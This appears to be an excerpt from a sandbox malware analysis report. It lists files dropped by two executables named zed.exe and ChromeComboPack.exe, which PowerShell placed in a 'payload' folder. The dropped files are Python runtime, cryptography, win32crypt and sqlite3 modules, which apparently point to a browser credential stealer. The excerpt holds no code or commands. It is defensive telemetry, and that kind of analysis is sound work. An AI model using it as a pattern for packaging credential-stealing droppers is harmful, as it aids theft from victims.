Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_asyncio.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\python312.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\libssl-3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\pyexpat.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_bz2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_ctypes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_queue.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\zlib1.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_asyncio.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_hashlib.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\gogjothegoat\payload\zed.exeJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_overlapped.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\python3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_queue.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_bz2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\tk86t.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_tkinter.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_ssl.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_ssl.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\libssl-3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_asyncio.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\libffi-8.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_lzma.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_overlapped.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\tcl86t.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\python312.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\libffi-8.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_wmi.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_decimal.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_ssl.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\python3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_ctypes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_socket.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\pyexpat.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\python3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_tkinter.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\tk86t.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_queue.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_wmi.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_socket.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\unicodedata.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_hashlib.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\unicodedata.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_decimal.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_lzma.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\zlib1.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\python312.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_wmi.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\tcl86t.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\sqlite3.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_cffi_backend.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_ctypes.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13362\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA1.pydJump to dropped file
